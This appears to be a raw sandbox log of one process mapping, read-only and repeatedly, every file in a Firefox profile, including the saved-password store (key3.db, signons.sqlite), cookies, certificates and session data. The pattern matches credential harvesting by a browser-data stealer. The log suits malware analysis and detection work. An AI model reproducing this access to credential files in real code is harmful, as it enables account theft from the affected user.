Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
